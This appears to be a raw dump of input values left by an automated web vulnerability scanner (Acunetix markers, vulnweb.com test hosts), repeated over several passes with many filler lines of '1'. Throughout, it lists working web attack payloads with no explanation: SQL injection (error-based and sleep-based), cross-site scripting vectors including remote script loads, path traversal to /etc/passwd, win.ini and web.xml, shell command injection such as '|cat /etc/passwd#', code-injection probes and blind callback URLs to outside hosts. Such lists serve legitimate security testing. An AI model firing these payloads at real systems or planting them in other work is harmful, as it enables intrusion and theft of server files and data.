'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(110),CHAR(71),CHAR(100),CHAR(109),CHAR(56),CHAR(48),CHAR(90)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1

1_947663

1

1

1<input autofocus onfocus=prompt(978461)>

1

../../../../../../../../../../boot.ini

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(110),CHAR(71),CHAR(100),CHAR(109),CHAR(56),CHAR(48),CHAR(90)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

'+response.write(9716930*9792632)+'

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9716930*9792632)+"

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(110)+CHAR(71)+CHAR(100)+CHAR(109)+CHAR(56)+CHAR(48)+CHAR(90)) FROM syscolumns)+'

1

1

1

[url=http://www.acunetix.com]website security[/url]

'&cat /etc/passwd&'

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(110)+CHAR(71)+CHAR(100)+CHAR(109)+CHAR(56)+CHAR(48)+CHAR(90))+'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

"&cat /etc/passwd&"

1_NIoGm <ScRiPt >prompt(984711)</ScRiPt>

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(71),CHAR(70),CHAR(74),CHAR(118),CHAR(110),CHAR(49),CHAR(72),CHAR(107)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

1

................windowswin.ini

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(71),CHAR(70),CHAR(74),CHAR(118),CHAR(110),CHAR(49),CHAR(72),CHAR(107)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(71)+CHAR(70)+CHAR(74)+CHAR(118)+CHAR(110)+CHAR(49)+CHAR(72)+CHAR(107)) FROM syscolumns)+"

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(71)+CHAR(70)+CHAR(74)+CHAR(118)+CHAR(110)+CHAR(49)+CHAR(72)+CHAR(107))+"

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

|cat /etc/passwd#

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acu1429\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1429

1

'|'ld

1

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"|"ld

acux5140\xc0\xbez1\xc0\xbcz2a\x90bcxuca5140

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1<ScRiPt >prompt(946848)</ScRiPt>

-1

1

1

${99923+100321}

1<script>prompt(919718)</script>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'

1

WEB-INF/web.xml

1

1

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(914679)</ScRiPt>

"

-1))

)

1

1&n919873=v924765

WEB-INF\web.xml

1

q7r6QZsk'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?966551></ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

||cat /etc/passwd

1

u9FSzxrN')

1

1

1

&dir

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

1<ScRiPt >prompt(981920)</ScRiPt>

Lhq5fgUS'))

1

1

1

1<video><source onerror="javascript:prompt(929487)">

-1

/etc/passwd

1

'&dir&'

1

1

1

-1)

'"()

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908595)"></g></svg>

"&dir&"

1

1

-1))

1

1

|dir

1<div style=width:expression(prompt(975686))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

R5t0DBjW'

1

1<iframe src='data:text/html

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'|dir

'

1<body onload=prompt(948749)>

1

http://hitBcz41zg3bZ.bxss.me/

1

URns7Zle')

1

"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978540)>

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

YX4izJSy'))

1

1

acunetix_wvs_invalid_filename

1<img src=xyz OnErRor=prompt(927925)>

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

http://www.acunetix.tst

1<img/src=">" onerror=alert(953960)>

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

'"

1<ScRiPt%20>prompt(971717)</sCripT>

1'"()&%<ScRiPt >prompt(944938)</ScRiPt>

1

comments

1

1

'"()&%<ScRiPt >prompt(915458)</ScRiPt>

1&lt

<!--

WEB-INF/web.xml

1

1

comments/.

1

1

1

1_908607

\xf6<img acu onmouseover=prompt(969787) //\xf6>

1

1

WEB-INF\web.xml

1

1

1<input autofocus onfocus=prompt(902775)>

1

1

response.write(9168253*9397205)

1

../../../../../../../../../../windows/win.ini

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'+response.write(9168253*9397205)+'

1

../../../../../../../../../../boot.ini

1

1

"+response.write(9168253*9397205)+"

[url=http://www.acunetix.com]website security[/url]

&cat /etc/passwd&

1

1

../../../../../../../../../../windows/win.ini.jpg

1_CUUSr <ScRiPt >prompt(908958)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'&cat /etc/passwd&'

1

1

1

1

1

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

acu2390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2390

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd

1

acux2486\xc0\xbez1\xc0\xbcz2a\x90bcxuca2486

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt >prompt(926825)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<script>prompt(981248)</script>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<ScRiPt >prompt(925512)</ScRiPt>

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

-1

${100220+100325}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996897></ScRiPt>

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1)

1

1<ScRiPt >prompt(956258)</ScRiPt>

1

"|"ld

-1))

1&n983269=v992910

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1<video><source onerror="javascript:prompt(903071)">

)

1

WEB-INF/web.xml

1

dLf5pNTG'

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971941)"></g></svg>

^(#$!@#$)(()))******

WEB-INF\web.xml

1

0JyH9ioP')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1<div style=width:expression(prompt(913810))>

testasp.vulnweb.com

1

1

JZlhB02q'))

1

'"()

/etc/passwd

1

1

"

1

1<iframe src='data:text/html

-1

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1<body onload=prompt(900055)>

||cat /etc/passwd

1

-1))

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984961)>

21SxEEEX'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img src=xyz OnErRor=prompt(948185)>

1d4z8dqG')

'&dir&'

1

"

1

1

1

1

wXCymJC8'))

1<img/src=">" onerror=alert(919839)>

http://hit2LXtHFQUed.bxss.me/

"&dir&"

${@print(md5(acunetix_wvs_security_test))}

1

file:///etc/passwd

1<ScRiPt%20>prompt(933032)</sCripT>

1

1

acunetix_wvs_invalid_filename

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

1&lt

1

comments

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

http://www.acunetix.tst

comments/.

1

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(957209) //\xf6>

1

1

<!--

"|dir

1

1

1

1

1<input autofocus onfocus=prompt(987970)>

WEB-INF\web.xml

1

1

1'"()&%<ScRiPt >prompt(991179)</ScRiPt>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini

response.write(9734613*9010473)

1

'"()&%<ScRiPt >prompt(914750)</ScRiPt>

1

1

[url=http://www.acunetix.com]website security[/url]

'+response.write(9734613*9010473)+'

1

1

../../../../../../../../../../boot.ini

1

1_GmJrb <ScRiPt >prompt(988896)</ScRiPt>

"+response.write(9734613*9010473)+"

1_920588

1

&cat /etc/passwd&

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

1

1

1

1

cat /etc/passwd

1

1

1

acu5110\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5110

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acux2537\xc0\xbez1\xc0\xbcz2a\x90bcxuca2537

${99656+100078}

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1<ScRiPt >prompt(934990)</ScRiPt>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<script>prompt(998438)</script>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1&n931831=v946459

)

'|'ld

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt >prompt(901677)</ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

-1)

!(()&&!|*|*|

1

1

WEB-INF/web.xml

-1))

1

testasp.vulnweb.com

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965580></ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

WEB-INF\web.xml

yDLdIqcm'

'

1

1

1<ScRiPt >prompt(926341)</ScRiPt>

'"()

/etc/passwd

"

1

kowpfYwL')

1

1

1

1

1<video><source onerror="javascript:prompt(965002)">

1

p4ILGE9V'))

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992241)"></g></svg>

1

-1)

1

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<div style=width:expression(prompt(941486))>

1

-1))

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'

1

1

1

JjhuSfh9'

1<iframe src='data:text/html

1

1

1

acunetix_wvs_invalid_filename

"&dir&"

"

http://hit9fzGdeXGh6.bxss.me/

1

1<body onload=prompt(909256)>

XcaRrHBs')

1

|dir

${@print(md5(acunetix_wvs_security_test))}

1

comments

file:///etc/passwd

'|dir

MuG5OZfx'))

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(907505)>

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

1'"

1

1<img src=xyz OnErRor=prompt(999129)>

WEB-INF/web.xml

1

comments/.

1

1

\

1<img/src=">" onerror=alert(997985)>

1

1

http://www.acunetix.tst

1\xc0xa7\xc0\xa2

WEB-INF\web.xml

1

1<ScRiPt%20>prompt(973973)</sCripT>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1&lt

1

'"

../../../../../../../../../../boot.ini

1

1

\xf6<img acu onmouseover=prompt(939865) //\xf6>

1

1

1

<!--

1

../../../../../../../../../../windows/win.ini.jpg

1'"()&%<ScRiPt >prompt(966695)</ScRiPt>

1<input autofocus onfocus=prompt(957819)>

1

response.write(9763052*9385589)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'+response.write(9763052*9385589)+'

&cat /etc/passwd&

1

1

'"()&%<ScRiPt >prompt(945271)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

"+response.write(9763052*9385589)+"

1

[url=http://www.acunetix.com]website security[/url]

1_945155

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1_F0Nch <ScRiPt >prompt(939773)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

|cat /etc/passwd#

${99362+99723}

1

1

1

acu3197\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3197

../../../../../../../../../../etc/passwd.jpg

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

'|'ld

1&n929941=v952189

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

WEB-INF/web.xml

acux3670\xc0\xbez1\xc0\xbcz2a\x90bcxuca3670

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

1<ScRiPt >prompt(975274)</ScRiPt>

)

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

WEB-INF\web.xml

1<script>prompt(902456)</script>

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1<ScRiPt >prompt(997679)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

1

testasp.vulnweb.com

'

1

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988261></ScRiPt>

deI9WSNR'

1

1

1

yMT0hn1L')

1

1

/etc/passwd

1

"

1<ScRiPt >prompt(973555)</ScRiPt>

1

1

1

XkRNMzmF'))

1

1<video><source onerror="javascript:prompt(911247)">

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976495)"></g></svg>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

-1)

&dir

1

1

1

1<div style=width:expression(prompt(981532))>

http://hittrTxIW2DMi.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

${@print(md5(acunetix_wvs_security_test))}

'&dir&'

acunetix_wvs_invalid_filename

1

1<iframe src='data:text/html

1

1

2W32MnRe'

1

"&dir&"

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

hyVxOSWQ')

1<body onload=prompt(901746)>

http://www.acunetix.tst

1

file:///etc/passwd

1

|dir

comments

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904578)>

Fq9x08z2'))

'"

1

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1<img src=xyz OnErRor=prompt(986861)>

1

<!--

1

1

1<img/src=">" onerror=alert(940713)>

1

1

1

comments/.

WEB-INF/web.xml

"|dir

1'"()&%<ScRiPt >prompt(923623)</ScRiPt>

1

1

1<ScRiPt%20>prompt(933699)</sCripT>

1

1

1

response.write(9451908*9812560)

1

'"()&%<ScRiPt >prompt(983318)</ScRiPt>

WEB-INF\web.xml

1

1

'+response.write(9451908*9812560)+'

1

1&lt

1

1

1

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini

1_912704

1

"+response.write(9451908*9812560)+"

1

1

\xf6<img acu onmouseover=prompt(925197) //\xf6>

'&cat /etc/passwd&'

1

1

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(984243)>

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

[url=http://www.acunetix.com]website security[/url]

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

................windowswin.ini

1_VcCCS <ScRiPt >prompt(985100)</ScRiPt>

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9.282),0)/*'XOR(if(now()=sysdate(),sleep(9.282),0))OR'"XOR(if(now()=sysdate(),sleep(9.282),0))OR"*/

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

(select(0)from(select(sleep(9.282)))v)/*'+(select(0)from(select(sleep(9.282)))v)+'"+(select(0)from(select(sleep(9.282)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

acu1964\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1964

-1

1

1

1

-1)

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux8326\xc0\xbez1\xc0\xbcz2a\x90bcxuca8326

1

1

1

${100181+99773}

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(928045)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

ytblDjyu'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(944698)</script>

MB2b91l5')

1&n909391=v953298

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(978069)</ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

kMFDYb7b'))

'

testasp.vulnweb.com

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988914></ScRiPt>

)

/etc/passwd

-1

1

WEB-INF/web.xml

1

"

1

1<ScRiPt >prompt(901590)</ScRiPt>

1

-1)

!(()&&!|*|*|

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1<video><source onerror="javascript:prompt(900005)">

1

WEB-INF\web.xml

1

^(#$!@#$)(()))******

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'"()

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938179)"></g></svg>

&dir

1

1

vDSS9J5l'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1<div style=width:expression(prompt(987401))>

1

1

waiivvjS')

1

1

1

1

1

"&dir&"

zIS6ta32'))

'

1<iframe src='data:text/html

1

file:///etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<body onload=prompt(987150)>

|dir

"

http://hitkgppnTaAYi.bxss.me/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(901028)>

1

acunetix_wvs_invalid_filename

/\../\../\../\../\../\../\../etc/passwd

1

1

1<img src=xyz OnErRor=prompt(990202)>

'|dir

${@print(md5(acunetix_wvs_security_test))}

1

comments

1<img/src=">" onerror=alert(954650)>

1

WEB-INF/web.xml

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

"|dir

${@print(md5(acunetix_wvs_security_test))}\

1

1<ScRiPt%20>prompt(915641)</sCripT>

comments/.

1

WEB-INF\web.xml

1

1

http://www.acunetix.tst

1

1&lt

1

../../../../../../../../../../windows/win.ini

1'"()&%<ScRiPt >prompt(968014)</ScRiPt>

1

'"

1

\xf6<img acu onmouseover=prompt(900605) //\xf6>

'"()&%<ScRiPt >prompt(931626)</ScRiPt>

<!--

1

../../../../../../../../../../boot.ini

1

1

1<input autofocus onfocus=prompt(945000)>

1

1

1_993474

../../../../../../../../../../windows/win.ini.jpg

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

response.write(9458870*9598801)

1_WzWZx <ScRiPt >prompt(948691)</ScRiPt>

1

1

1

1

'+response.write(9458870*9598801)+'

................windowswin.ini

1

1

1

1

&cat /etc/passwd&

1

"+response.write(9458870*9598801)+"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu10894\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10894

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

acux7587\xc0\xbez1\xc0\xbcz2a\x90bcxuca7587

1

1

cat /etc/passwd

1

1

1

1

1<ScRiPt >prompt(957543)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

${100033+99484}

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1<script>prompt(953336)</script>

`cat /etc/passwd`

1

1

1&n917899=v998661

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

1

WEB-INF\web.xml

1<ScRiPt >prompt(938431)</ScRiPt>

1

-1

!(()&&!|*|*|

1

1some_inexistent_file_with_long_name%00.jpg

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld
